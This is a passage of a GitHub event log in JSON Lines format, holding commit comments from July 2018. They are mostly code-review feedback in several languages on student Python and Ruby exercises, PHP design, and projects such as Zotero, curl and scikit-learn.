<https://github.com/notifications/unsubscribe-auth/AdNPOhLHwiwm_8MrBt1MK7rmRSK8zL8Rks5uKtg2gaJpZM4VjKea>\n> .\n>\n"}},"created_at":"2018-07-29T07:34:02Z"}
{"id":"8033542319","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18016/programming-term2"},"payload":{"comment":{"id":29873162,"position":null,"line":null,"path":null,"commit_id":"964397e684a896f4bd9b80f5284c749a5b79c8b1","created_at":"2018-07-29T07:34:41Z","updated_at":"2018-07-29T07:34:41Z","author_association":"NONE","body":"確認しました。結果としては間違ってませんが、下記の点がちょっと惜しい気がします。\r\n\r\n・関数の定義の前にprint()の処理が記載されています。(1,2行目)事前に関数を定義してから実行される処理を書きましょう。\r\n・関数と関数の間、関数とメイン処理の間は1行開けましょう。(addとsubの間とか、divとその後の間とか)\r\n・関数の中のdocstringですが、ParametersとReturnsも書きましょう。\r\n・メイン処理の第1パラメータ、第2パラメータの入力チェックにて、exceptでエラー処理をしていますが、これはtry句がないと意味をなしません。詳しくは例外処理の際に説明します。\r\n・演算方法の入力チェックですが、+-*/の場合はそれぞれ「相反する条件」なので、42,46,50行目はelifでよいと思います。\r\n・実際計算をする際に、せっかく定義した関数が呼び出されていません。例えば39,40行目ですが、\r\nprint(\"結果は{0}です。\".format(add(num1, num2)))\r\nといった具合に、定義済みの関数addを呼び出して計算結果を得ることができます。"}},"created_at":"2018-07-29T07:34:41Z"}
{"id":"8033542976","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dwk5/ruby_basics"},"payload":{"comment":{"id":29873163,"position":30,"line":41,"path":"lesson3/station.rb","commit_id":"33d5d91abe4fbf7b81109e3bb069c7b04c7f9169","created_at":"2018-07-29T07:35:16Z","updated_at":"2018-07-29T07:35:16Z","author_association":"NONE","body":"В руби почти везде используется фишка, что все кроме false и nil является \"правдивыми\" значениями. То есть, если все, что угодно (кроме того, что вычислится в nil или false) можно подставить в if стэйтмэнт в виде условия. Например\r\n```\r\nif @route.add_station(station)\r\n  # выводим сообщение об успехе\r\n  # делаем что-то еще\r\nelse\r\n  # выводим сообщение об ошибке\r\n  # делаем еще какую-то обработку\r\nend\r\n```\r\nНо тут у нас возникнет проблема при текущей реализации. Потому-что методы вывода - выводят в терминал свои сообщение но при этом возвращают nil. И это значит, что раз последняя строка у нас вывод (а результат последней выполненной строки всегда и является тем, что будет возвращено из метода), то метод вернет nil и мы пойдем в else ветку"}},"created_at":"2018-07-29T07:35:16Z"}
{"id":"8033543253","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18016/programming-term2"},"payload":{"comment":{"id":29873164,"position":null,"line":null,"path":null,"commit_id":"964397e684a896f4bd9b80f5284c749a5b79c8b1","created_at":"2018-07-29T07:35:31Z","updated_at":"2018-07-29T07:35:31Z","author_association":"NONE","body":"あと、ヘルプが表示されていないようです。"}},"created_at":"2018-07-29T07:35:31Z"}
{"id":"8033544392","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dwk5/ruby_basics"},"payload":{"comment":{"id":29873168,"position":45,"line":54,"path":"lesson3/station.rb","commit_id":"33d5d91abe4fbf7b81109e3bb069c7b04c7f9169","created_at":"2018-07-29T07:36:30Z","updated_at":"2018-07-29T07:36:30Z","author_association":"NONE","body":"Тут не нужна интерполяция. station.name и так является строкой"}},"created_at":"2018-07-29T07:36:30Z"}
{"id":"8033544718","type":"CommitCommentEvent","actor":{"login":"tyb9900"},"repo":{"name":"tyb9900/MBREP"},"payload":{"comment":{"id":29873169,"position":null,"line":null,"path":null,"commit_id":"1dc0ea780d0d46595d96948a144293ac3be0e8da","created_at":"2018-07-29T07:36:47Z","updated_at":"2018-07-29T07:36:47Z","author_association":"OWNER","body":"Removed Extra Files!"}},"created_at":"2018-07-29T07:36:47Z"}
{"id":"8033544805","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18018/programming-term2"},"payload":{"comment":{"id":29873170,"position":null,"line":null,"path":null,"commit_id":"9bc2e005d5a5cd6c95b931db96e17c6dcc623493","created_at":"2018-07-29T07:36:51Z","updated_at":"2018-07-29T07:36:51Z","author_association":"NONE","body":"実際に関数を呼び出しての演算が出来ていないようですね。\r\n次回講義前にサンプルコードをpushしますので、参考にしてみてくださいね。"}},"created_at":"2018-07-29T07:36:51Z"}
{"id":"8033544836","type":"CommitCommentEvent","actor":{"login":"inevermind"},"repo":{"name":"inevermind/test_work"},"payload":{"comment":{"id":29873171,"position":36,"line":36,"path":"review/DecoratorManager.php","commit_id":"7440f107ed894933769a27bad6453463a012fb4d","created_at":"2018-07-29T07:36:52Z","updated_at":"2018-07-29T07:36:52Z","author_association":"OWNER","body":"Одна из отличительных особенностей декоратора - интерфейс (основной) должен совпадать.\r\nВ данном примере мы интерфейс меняем (get против getResponse). Это неверно."}},"created_at":"2018-07-29T07:36:52Z"}
{"id":"8033545730","type":"CommitCommentEvent","actor":{"login":"inevermind"},"repo":{"name":"inevermind/test_work"},"payload":{"comment":{"id":29873172,"position":22,"line":22,"path":"review/DecoratorManager.php","commit_id":"7440f107ed894933769a27bad6453463a012fb4d","created_at":"2018-07-29T07:37:45Z","updated_at":"2018-07-29T07:37:45Z","author_association":"OWNER","body":"В данном случае стоило бы создать интерфейс\\абстрактный класс DataProvider'a и прокидывать его объект в конструктор декоратора, дабы не проносить через него переменные необходимые именно DataProvider'у."}},"created_at":"2018-07-29T07:37:45Z"}
{"id":"8033547692","type":"CommitCommentEvent","actor":{"login":"achirkin"},"repo":{"name":"achirkin/vulkan"},"payload":{"comment":{"id":29873177,"position":null,"line":null,"path":null,"commit_id":"74a9e9c670388b0a0b67274a7ccf7ae291efac59","created_at":"2018-07-29T07:39:31Z","updated_at":"2018-07-29T07:39:31Z","author_association":"OWNER","body":"Oops, reference to an issue in a wrong project. This is meant to answer a comment in https://github.com/achirkin/easytensor/issues/4"}},"created_at":"2018-07-29T07:39:31Z"}
{"id":"8033549194","type":"CommitCommentEvent","actor":{"login":"Vihru"},"repo":{"name":"dogiex/MIUI-XML-10-FINNISH"},"payload":{"comment":{"id":29873179,"position":null,"line":null,"path":null,"commit_id":"9f15de3da5deb26ef4d50e429238a72a2a9f0332","created_at":"2018-07-29T07:40:47Z","updated_at":"2018-07-29T07:40:47Z","author_association":"NONE","body":"su 29. heinäk. 2018 klo 10.27 Dogiex <notifications@github.com> kirjoitti:\n\n> @Vihru <https://github.com/Vihru> en osaa sanoa ilman lisätietoja, kun\n> puhelimessani Cancro/RN3SE ei ole vielä MIUI 10.\n> Viikonlopun jälkeen saan asennettua sen.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/dogiex/MIUI-XML-10-FINNISH/commit/9f15de3da5deb26ef4d50e429238a72a2a9f0332#commitcomment-29873142>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/APl00gAPN1Uqdp4pnpyPUbDfzfMSZS8eks5uLWPQgaJpZM4VlGns>\n> .\n>\n"}},"created_at":"2018-07-29T07:40:47Z"}
{"id":"8033549940","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18012/programming-term2"},"payload":{"comment":{"id":29873180,"position":null,"line":null,"path":null,"commit_id":"3b756c0c2041dd0476582638ff398ad0de10d433","created_at":"2018-07-29T07:41:22Z","updated_at":"2018-07-29T07:41:22Z","author_association":"NONE","body":"すみません、先ほどのコメントへの補足です。\r\ntry〜exceptの後のelseですが、例外とならなかった場合に通るのを僕が把握していませんでした、申し訳ない。\r\nそこは問題なしです。"}},"created_at":"2018-07-29T07:41:22Z"}
{"id":"8033551284","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dwk5/ruby_basics"},"payload":{"comment":{"id":29873184,"position":53,"line":60,"path":"lesson3/station.rb","commit_id":"33d5d91abe4fbf7b81109e3bb069c7b04c7f9169","created_at":"2018-07-29T07:42:35Z","updated_at":"2018-07-29T07:42:35Z","author_association":"NONE","body":"Индекс, это деталь внутренней реализации класса. Скорее \"системная\" вещь поезда. Ее не следует открывать внешнему коду даже для чтения. Как поезд будет находит свои текущие/следующие/предыдущие станции - это забота поезда, и не следует давать внешнему коду деталей реализации."}},"created_at":"2018-07-29T07:42:35Z"}
{"id":"8033552378","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18019/programming-term2"},"payload":{"comment":{"id":29873188,"position":null,"line":null,"path":null,"commit_id":"4068da88d05459d68119cedddbb4a41ded374232","created_at":"2018-07-29T07:43:34Z","updated_at":"2018-07-29T07:43:34Z","author_association":"NONE","body":"回答確認しました。\r\ndocstringも問題なく、エラー処理もtry〜exceptで処理されていて問題ないコードになっていると思います。\r\n1点。ヘルプが表示されていないです。"}},"created_at":"2018-07-29T07:43:34Z"}
{"id":"8033553485","type":"CommitCommentEvent","actor":{"login":"CaoBourne"},"repo":{"name":"CaoJonas/SuperMarket"},"payload":{"comment":{"id":29873193,"position":null,"line":null,"path":null,"commit_id":"c6cd1da29072f32476c199d1b5f66074f990d985","created_at":"2018-07-29T07:44:30Z","updated_at":"2018-07-29T07:44:30Z","author_association":"COLLABORATOR","body":"it's funny;"}},"created_at":"2018-07-29T07:44:30Z"}
{"id":"8033554100","type":"CommitCommentEvent","actor":{"login":"flipchan"},"repo":{"name":"redjack/marionette"},"payload":{"comment":{"id":29873197,"position":null,"line":null,"path":null,"commit_id":"349ad85bf176db8b31f95deece9a4375dfc5947d","created_at":"2018-07-29T07:45:03Z","updated_at":"2018-07-29T07:45:03Z","author_association":"NONE","body":"\"    © 2018 GitHub, Inc.\r\n    Terms\r\n    Privacy\r\n    Security\r\n    Status\r\n    Help\r\n    Contact GitHub\"\r\n should ofc not be in here but it somehow ended up in my buffer when copied"}},"created_at":"2018-07-29T07:45:03Z"}
{"id":"8033554278","type":"CommitCommentEvent","actor":{"login":"CaoBourne"},"repo":{"name":"CaoJonas/SuperMarket"},"payload":{"comment":{"id":29873202,"position":null,"line":null,"path":null,"commit_id":"c6cd1da29072f32476c199d1b5f66074f990d985","created_at":"2018-07-29T07:45:12Z","updated_at":"2018-07-29T07:45:12Z","author_association":"COLLABORATOR","body":"Yeah. Thank you."}},"created_at":"2018-07-29T07:45:12Z"}
{"id":"8033554759","type":"CommitCommentEvent","actor":{"login":"KSingh97"},"repo":{"name":"KSingh97/getting-and-cleaning-dataset"},"payload":{"comment":{"id":29873205,"position":null,"line":null,"path":null,"commit_id":"0c867337bd1f605c49d341e55f599b911e0ba440","created_at":"2018-07-29T07:45:37Z","updated_at":"2018-07-29T07:45:37Z","author_association":"OWNER","body":"[codebook.txt](https://github.com/KSingh97/getting-and-cleaning-dataset/files/2238590/codebook.txt)\r\n"}},"created_at":"2018-07-29T07:45:37Z"}
{"id":"8033555091","type":"CommitCommentEvent","actor":{"login":"dstillman"},"repo":{"name":"zotero/zotero"},"payload":{"comment":{"id":29873206,"position":28,"line":28,"path":"chrome/content/zotero/xpcom/intl.js","commit_id":"38166d4e05d5539df6ef3a0f30f04fd5dad3a60c","created_at":"2018-07-29T07:45:57Z","updated_at":"2018-07-29T07:45:57Z","author_association":"MEMBER","body":"Yeah, should be fine."}},"created_at":"2018-07-29T07:45:57Z"}
{"id":"8033555115","type":"CommitCommentEvent","actor":{"login":"flipchan"},"repo":{"name":"redjack/marionette"},"payload":{"comment":{"id":29873207,"position":19,"line":19,"path":"mar/formats/20150701/http_webproxy/ebay.mar","commit_id":"349ad85bf176db8b31f95deece9a4375dfc5947d","created_at":"2018-07-29T07:45:59Z","updated_at":"2018-07-29T07:45:59Z","author_association":"NONE","body":"remove line"}},"created_at":"2018-07-29T07:45:59Z"}
{"id":"8033555396","type":"CommitCommentEvent","actor":{"login":"mwojtkowski"},"repo":{"name":"mwojtkowski/Ovale"},"payload":{"comment":{"id":29873208,"position":null,"line":null,"path":null,"commit_id":"5fee20655acba9328b9aba665075d191db7afe1d","created_at":"2018-07-29T07:46:15Z","updated_at":"2018-07-29T07:46:15Z","author_association":"OWNER","body":"I agree we don't need ilvl, all we need to know is if we have itemId equipped or not"}},"created_at":"2018-07-29T07:46:15Z"}
{"id":"8033555677","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18020/programming-term2"},"payload":{"comment":{"id":29873210,"position":null,"line":null,"path":null,"commit_id":"48d999af74bb79ac1dff9570c67bd0a15209f655","created_at":"2018-07-29T07:46:29Z","updated_at":"2018-07-29T07:46:29Z","author_association":"NONE","body":"確認しました。add,sub,mul,divが「変数」となっていますが、「関数」として定義する課題でした。\r\nまた、docstringも記載されていません。"}},"created_at":"2018-07-29T07:46:29Z"}
{"id":"8033555765","type":"CommitCommentEvent","actor":{"login":"dstillman"},"repo":{"name":"zotero/zotero"},"payload":{"comment":{"id":29873211,"position":25,"line":25,"path":"chrome/content/zotero/xpcom/intl.js","commit_id":"38166d4e05d5539df6ef3a0f30f04fd5dad3a60c","created_at":"2018-07-29T07:46:34Z","updated_at":"2018-07-29T07:46:34Z","author_association":"MEMBER","body":"Should capitalize the Intl for consistency with other Zotero.[x] objects."}},"created_at":"2018-07-29T07:46:34Z"}
{"id":"8033556852","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dwk5/ruby_basics"},"payload":{"comment":{"id":29873218,"position":53,"line":60,"path":"lesson3/station.rb","commit_id":"33d5d91abe4fbf7b81109e3bb069c7b04c7f9169","created_at":"2018-07-29T07:47:36Z","updated_at":"2018-07-29T07:47:36Z","author_association":"NONE","body":"Тоже самое и со :station (что как я понимаю подразумевает current_station).  Это будет внутренний метод, а не ридер. Дело в том, что ```attr_reader :current_station ```под капотом делает это:\r\n```\r\ndef current_station\r\n  @current_station\r\nend\r\n```\r\nНо мы не хотим в инстанс переменных иметь то, что можно вычислить из другой инстанс переменной. Для этого нужно использовать методы. И для нахождения текущей станции у нас уже есть `index`"}},"created_at":"2018-07-29T07:47:36Z"}
{"id":"8033557168","type":"CommitCommentEvent","actor":{"login":"CaoJonas"},"repo":{"name":"CaoJonas/SuperMarket"},"payload":{"comment":{"id":29873222,"position":null,"line":null,"path":null,"commit_id":"c6cd1da29072f32476c199d1b5f66074f990d985","created_at":"2018-07-29T07:47:51Z","updated_at":"2018-07-29T07:47:51Z","author_association":"OWNER","body":"Haha"}},"created_at":"2018-07-29T07:47:51Z"}
{"id":"8033557404","type":"CommitCommentEvent","actor":{"login":"Dunbaratu"},"repo":{"name":"KSP-KOS/KOS"},"payload":{"comment":{"id":29873223,"position":null,"line":null,"path":null,"commit_id":"83076f345cd86eaebd6fa7f0dd8810c22016bfa0","created_at":"2018-07-29T07:48:03Z","updated_at":"2018-07-29T07:48:03Z","author_association":"MEMBER","body":"It will be in the next release.  I have no clue when the next release is."}},"created_at":"2018-07-29T07:48:03Z"}
{"id":"8033557650","type":"CommitCommentEvent","actor":{"login":"CaoJonas"},"repo":{"name":"CaoJonas/SuperMarket"},"payload":{"comment":{"id":29873225,"position":null,"line":null,"path":null,"commit_id":"c6cd1da29072f32476c199d1b5f66074f990d985","created_at":"2018-07-29T07:48:16Z","updated_at":"2018-07-29T07:48:16Z","author_association":"OWNER","body":"Good Job! \r\n\r\n"}},"created_at":"2018-07-29T07:48:16Z"}
{"id":"8033558302","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dwk5/ruby_basics"},"payload":{"comment":{"id":29873226,"position":61,"line":68,"path":"lesson3/station.rb","commit_id":"33d5d91abe4fbf7b81109e3bb069c7b04c7f9169","created_at":"2018-07-29T07:48:51Z","updated_at":"2018-07-29T07:48:51Z","author_association":"NONE","body":"То есть station можно убрать из инишалайза, потому-что инстанс переменные до того, как они заданы и так являются nil."}},"created_at":"2018-07-29T07:48:51Z"}
{"id":"8033558495","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dwk5/ruby_basics"},"payload":{"comment":{"id":29873227,"position":60,"line":67,"path":"lesson3/station.rb","commit_id":"33d5d91abe4fbf7b81109e3bb069c7b04c7f9169","created_at":"2018-07-29T07:49:02Z","updated_at":"2018-07-29T07:49:02Z","author_association":"NONE","body":"То есть station можно убрать из инишалайза, потому-что инстанс переменные до того, как они заданы и так являются nil.\r\n\r\n"}},"created_at":"2018-07-29T07:49:02Z"}
{"id":"8033558842","type":"CommitCommentEvent","actor":{"login":"CaoJonas"},"repo":{"name":"CaoJonas/SuperMarket"},"payload":{"comment":{"id":29873228,"position":19,"line":19,"path":"index2.html","commit_id":"c6cd1da29072f32476c199d1b5f66074f990d985","created_at":"2018-07-29T07:49:23Z","updated_at":"2018-07-29T07:49:23Z","author_association":"OWNER","body":"I think that there some errors you must change it!"}},"created_at":"2018-07-29T07:49:23Z"}
{"id":"8033559632","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18022/programming-term2"},"payload":{"comment":{"id":29873231,"position":null,"line":null,"path":null,"commit_id":"90d2b98bb7ac73b0202fa9ed0ad9bcece6e4f357","created_at":"2018-07-29T07:50:04Z","updated_at":"2018-07-29T07:50:04Z","author_association":"NONE","body":"確認しました。出題内容としてはadd,sub,mul,divという「関数」を定義する課題だったので、それに沿っていません。\r\nまた、関数\"_3_\"では特に何も処理していないようです。"}},"created_at":"2018-07-29T07:50:04Z"}
{"id":"8033560440","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dwk5/ruby_basics"},"payload":{"comment":{"id":29873235,"position":67,"line":72,"path":"lesson3/station.rb","commit_id":"33d5d91abe4fbf7b81109e3bb069c7b04c7f9169","created_at":"2018-07-29T07:50:48Z","updated_at":"2018-07-29T07:50:48Z","author_association":"NONE","body":"Пробела перед скобкой с аргументом быть не должно"}},"created_at":"2018-07-29T07:50:48Z"}
{"id":"8033560958","type":"CommitCommentEvent","actor":{"login":"howe"},"repo":{"name":"nutzam/nutzmore"},"payload":{"comment":{"id":29873236,"position":null,"line":null,"path":null,"commit_id":"26408d2ce6080958e1eb45af3629f80a1295d950","created_at":"2018-07-29T07:51:15Z","updated_at":"2018-07-29T07:51:15Z","author_association":"MEMBER","body":"独立啥东西啊"}},"created_at":"2018-07-29T07:51:15Z"}
{"id":"8033561652","type":"CommitCommentEvent","actor":{"login":"CaoBourne"},"repo":{"name":"CaoJonas/SuperMarket"},"payload":{"comment":{"id":29873238,"position":13,"line":13,"path":"index2.html","commit_id":"c6cd1da29072f32476c199d1b5f66074f990d985","created_at":"2018-07-29T07:51:52Z","updated_at":"2018-07-29T07:51:52Z","author_association":"COLLABORATOR","body":"I think there are some errors you need change it;"}},"created_at":"2018-07-29T07:51:52Z"}
{"id":"8033562377","type":"CommitCommentEvent","actor":{"login":"CaoJonas"},"repo":{"name":"CaoJonas/SuperMarket"},"payload":{"comment":{"id":29873239,"position":13,"line":13,"path":"index2.html","commit_id":"c6cd1da29072f32476c199d1b5f66074f990d985","created_at":"2018-07-29T07:52:28Z","updated_at":"2018-07-29T07:52:28Z","author_association":"OWNER","body":"'px' is out"}},"created_at":"2018-07-29T07:52:28Z"}
{"id":"8033562852","type":"CommitCommentEvent","actor":{"login":"CaoBourne"},"repo":{"name":"CaoJonas/SuperMarket"},"payload":{"comment":{"id":29873242,"position":13,"line":13,"path":"index2.html","commit_id":"c6cd1da29072f32476c199d1b5f66074f990d985","created_at":"2018-07-29T07:52:54Z","updated_at":"2018-07-29T07:52:54Z","author_association":"COLLABORATOR","body":"Yeah, "}},"created_at":"2018-07-29T07:52:54Z"}
{"id":"8033564385","type":"CommitCommentEvent","actor":{"login":"jyrkive"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":29873246,"position":null,"line":null,"path":null,"commit_id":"52ae31efb21b31f5bb0763d1da24709e90393c59","created_at":"2018-07-29T07:54:21Z","updated_at":"2018-07-29T07:54:21Z","author_association":"MEMBER","body":"@jostephd Renaming the function would break backwards compatibility."}},"created_at":"2018-07-29T07:54:21Z"}
{"id":"8033565051","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dwk5/ruby_basics"},"payload":{"comment":{"id":29873247,"position":98,"line":112,"path":"lesson3/station.rb","commit_id":"33d5d91abe4fbf7b81109e3bb069c7b04c7f9169","created_at":"2018-07-29T07:54:56Z","updated_at":"2018-07-29T07:54:56Z","author_association":"NONE","body":"Тут нужно сказать текущей станции, что поезд с нее уехал. Потом сказать следующей станции, что поезд на нее приехал. Потом инкрементировать значение индекса текущей станции. Но перед всем этим нужно проверить, что слеудющая станция существует.\r\n````\r\n if next_station\r\n  # do your thing\r\n```"}},"created_at":"2018-07-29T07:54:56Z"}
{"id":"8033567030","type":"CommitCommentEvent","actor":{"login":"fengziboy"},"repo":{"name":"fengziboy/fenzi.github.io"},"payload":{"comment":{"id":29873249,"position":null,"line":null,"path":null,"commit_id":"049b3a4b589efa0bb3fb8d9d2107df4c402ca801","created_at":"2018-07-29T07:56:40Z","updated_at":"2018-07-29T07:56:40Z","author_association":"OWNER","body":"我的天啊\r\n"}},"created_at":"2018-07-29T07:56:40Z"}
{"id":"8033567944","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"s18001-ikeshiro/programming-term2"},"payload":{"comment":{"id":29873253,"position":null,"line":null,"path":null,"commit_id":"fa8d4d5d755e2365eb5d1bfa4495fba7b6337eb5","created_at":"2018-07-29T07:57:26Z","updated_at":"2018-07-29T07:57:26Z","author_association":"NONE","body":"うーん、出題のし方がまずかったかもしれませんね。\r\n今回重要だったのはチェックの部分ではなく、「関数を使って計算する」部分でした。\r\n7/31冒頭に解説します。そこでただコードを見るのではなく、ひとつひとつを理解してみてください。"}},"created_at":"2018-07-29T07:57:26Z"}
{"id":"8033581304","type":"CommitCommentEvent","actor":{"login":"peabee"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":29873276,"position":null,"line":null,"path":null,"commit_id":"f561d941956c56be4fb3aa6ccd15a2e7706a439f","created_at":"2018-07-29T08:08:21Z","updated_at":"2018-07-29T08:08:21Z","author_association":"CONTRIBUTOR","body":"actually gets picked up from tahr.....\r\n\r\nshouldn't pmusic_PLUGIN_tray versions be in common32 and common64 ?"}},"created_at":"2018-07-29T08:08:21Z"}
{"id":"8033583593","type":"CommitCommentEvent","actor":{"login":"TheFixerDevelopment"},"repo":{"name":"ImpladeDeveloped/Implactor"},"payload":{"comment":{"id":29873280,"position":null,"line":null,"path":null,"commit_id":"c05cb289ce41b8f4edaa3dd665f1fab6c66cfe32","created_at":"2018-07-29T08:10:17Z","updated_at":"2018-07-29T08:10:17Z","author_association":"NONE","body":"Learn to use proper grammar, Zade."}},"created_at":"2018-07-29T08:10:17Z"}
{"id":"8033588985","type":"CommitCommentEvent","actor":{"login":"YogeshMedz"},"repo":{"name":"YogeshMedz/WhoAreYou-"},"payload":{"comment":{"id":29873293,"position":null,"line":null,"path":null,"commit_id":"954a15b09414edb80780aafceb862f25b7739154","created_at":"2018-07-29T08:14:43Z","updated_at":"2018-07-29T08:14:43Z","author_association":"OWNER","body":"\r\n![Uploading IMG-20180728-WA0000.jpeg…]()\r\n\r\n"}},"created_at":"2018-07-29T08:14:43Z"}
{"id":"8033591952","type":"CommitCommentEvent","actor":{"login":"benas"},"repo":{"name":"spring-projects/spring-batch"},"payload":{"comment":{"id":29873297,"position":13,"line":53,"path":"spring-batch-integration/src/test/java/org/springframework/batch/integration/partition/MessageChannelPartitionHandlerTests.java","commit_id":"4b1a78323e1a779b374c1ac426f49dff51990983","created_at":"2018-07-29T08:17:04Z","updated_at":"2018-07-29T08:17:04Z","author_association":"CONTRIBUTOR","body":"Apology for this."}},"created_at":"2018-07-29T08:17:04Z"}
{"id":"8033592548","type":"CommitCommentEvent","actor":{"login":"dongqing065269"},"repo":{"name":"yuanqing811/ISIC2018"},"payload":{"comment":{"id":29873298,"position":283,"line":357,"path":"datasets/ISIC2018/__init__.py","commit_id":"d03bb9b0607d41b5e2bb2f527d51913ec7996ed7","created_at":"2018-07-29T08:17:35Z","updated_at":"2018-07-29T08:17:35Z","author_association":"NONE","body":"there, i got an error of \"in partition_task3_data  assert os.path.exists(fname)\"\r\nAssertionError......\r\n"}},"created_at":"2018-07-29T08:17:35Z"}
{"id":"8033594089","type":"CommitCommentEvent","actor":{"login":"por2008"},"repo":{"name":"por2008/docs"},"payload":{"comment":{"id":29873302,"position":null,"line":null,"path":null,"commit_id":"6bb0ffcefe9c5cd2c1451cf771a81a56117ed80c","created_at":"2018-07-29T08:19:00Z","updated_at":"2018-07-29T08:19:00Z","author_association":"OWNER","body":"thai-electronic-house.club"}},"created_at":"2018-07-29T08:19:00Z"}
{"id":"8033597142","type":"CommitCommentEvent","actor":{"login":"qinhanmin2014"},"repo":{"name":"scikit-learn/scikit-learn"},"payload":{"comment":{"id":29873312,"position":null,"line":null,"path":null,"commit_id":"54dc0d730fe12298f72093f74f47027f731dc182","created_at":"2018-07-29T08:21:45Z","updated_at":"2018-07-29T08:21:45Z","author_association":"MEMBER","body":"This seems strange, see http://scikit-learn.org/dev/modules/model_evaluation.html#balanced-accuracy-score (there's an extra ``\\``)\r\nWondering if there's a way to pass CI and provide a better doc."}},"created_at":"2018-07-29T08:21:45Z"}
{"id":"8033606621","type":"CommitCommentEvent","actor":{"login":"manup"},"repo":{"name":"dresden-elektronik/deconz-rest-plugin"},"payload":{"comment":{"id":29873336,"position":null,"line":null,"path":null,"commit_id":"b570bb4004a4c431ae609e171ee2c4371d7de0e7","created_at":"2018-07-29T08:29:59Z","updated_at":"2018-07-29T08:29:59Z","author_association":"CONTRIBUTOR","body":"You're right the ids seem to be wrong looks like a copy paste error :)"}},"created_at":"2018-07-29T08:29:59Z"}
{"id":"8033607971","type":"CommitCommentEvent","actor":{"login":"inevermind"},"repo":{"name":"inevermind/test_work"},"payload":{"comment":{"id":29873345,"position":6,"line":6,"path":"example/src/UsageExample.php","commit_id":"693a9617e1b0424ea251471514c1992e48e88e53","created_at":"2018-07-29T08:31:01Z","updated_at":"2018-07-29T08:31:01Z","author_association":"OWNER","body":"Тут небольшой хардкод, просто для примера использования.\r\nДанные настроек обычно хранятся в других местах.\r\nПровайдеры и другие параметры как правило прокидываются через реализацию контейнера IoC (например в symfony). В общем, это просто пример."}},"created_at":"2018-07-29T08:31:01Z"}
{"id":"8033608693","type":"CommitCommentEvent","actor":{"login":"MarcelRaad"},"repo":{"name":"curl/curl"},"payload":{"comment":{"id":29873346,"position":null,"line":null,"path":null,"commit_id":"35ecffb9be03d6d52c37163060087a5df51e9b2e","created_at":"2018-07-29T08:31:36Z","updated_at":"2018-07-29T08:31:36Z","author_association":"MEMBER","body":"@bagder This test fails for me as I have an extra User-Agent line:\r\nhttps://curl.haxx.se/dev/log.cgi?id=20180729044600-29214#prob4"}},"created_at":"2018-07-29T08:31:36Z"}
{"id":"8033608904","type":"CommitCommentEvent","actor":{"login":"inevermind"},"repo":{"name":"inevermind/test_work"},"payload":{"comment":{"id":29873348,"position":15,"line":15,"path":"example/src/Integration/DataProviderInterface.php","commit_id":"693a9617e1b0424ea251471514c1992e48e88e53","created_at":"2018-07-29T08:31:46Z","updated_at":"2018-07-29T08:31:46Z","author_association":"OWNER","body":"Как уже ранее говорил, тут лучше не использовать кастомную структуру реализованную на массивах.\r\nЛучше было бы сделать dto & access object, но сейчас не стал это делать."}},"created_at":"2018-07-29T08:31:46Z"}
{"id":"8033611983","type":"CommitCommentEvent","actor":{"login":"inevermind"},"repo":{"name":"inevermind/test_work"},"payload":{"comment":{"id":29873356,"position":2,"line":2,"path":"Counter.php","commit_id":"c0d4b2140b22affdeba6514e48f90366a45686e8","created_at":"2018-07-29T08:34:18Z","updated_at":"2018-07-29T08:34:18Z","author_association":"OWNER","body":"Версия класса счетчика без возможности чтения значения. В неблокирующем режиме пишутся значения в файл. Binary-safe.\r\nПодразумевается, что значение счетчика обсчитывается (агрегируется) фоновыми скриптами и куда-то кешируется.\r\n \r\nМинусы решения:\r\n    - Постоянное увеличение размера файла (можно схлопывать данные во время агрегации).\r\n    - Сложность логики\r\n    - Сложность получения актуального значения (в реал-тайме)"}},"created_at":"2018-07-29T08:34:18Z"}
{"id":"8033612148","type":"CommitCommentEvent","actor":{"login":"Asterisme"},"repo":{"name":"Asterisme/Kibana_Hanization"},"payload":{"comment":{"id":29873357,"position":null,"line":null,"path":null,"commit_id":"a2ca93a6f6f1a6acafd4fe410fa639c9fcfeebf8","created_at":"2018-07-29T08:34:26Z","updated_at":"2018-07-29T08:34:26Z","author_association":"OWNER","body":"APM页面更新完毕了"}},"created_at":"2018-07-29T08:34:26Z"}
{"id":"8033612463","type":"CommitCommentEvent","actor":{"login":"inevermind"},"repo":{"name":"inevermind/test_work"},"payload":{"comment":{"id":29873358,"position":46,"line":46,"path":"Counter.php","commit_id":"c0d4b2140b22affdeba6514e48f90366a45686e8","created_at":"2018-07-29T08:34:42Z","updated_at":"2018-07-29T08:34:42Z","author_association":"OWNER","body":"Можно добавить кеширование, если это позволяет бизнес логика\r\nЖелательно добавить агрегацию, т.к. количество итераций будет линейно расти"}},"created_at":"2018-07-29T08:34:42Z"}
{"id":"8033613841","type":"CommitCommentEvent","actor":{"login":"ZeroQI"},"repo":{"name":"ZeroQI/Hama.bundle"},"payload":{"comment":{"id":29873360,"position":null,"line":null,"path":null,"commit_id":"c6c03bc062789f4c30ecfe1186ebc5209d4228e7","created_at":"2018-07-29T08:35:51Z","updated_at":"2018-07-29T08:35:51Z","author_association":"OWNER","body":"https://github.com/ZeroQI/Hama.bundle/issues/242"}},"created_at":"2018-07-29T08:35:51Z"}
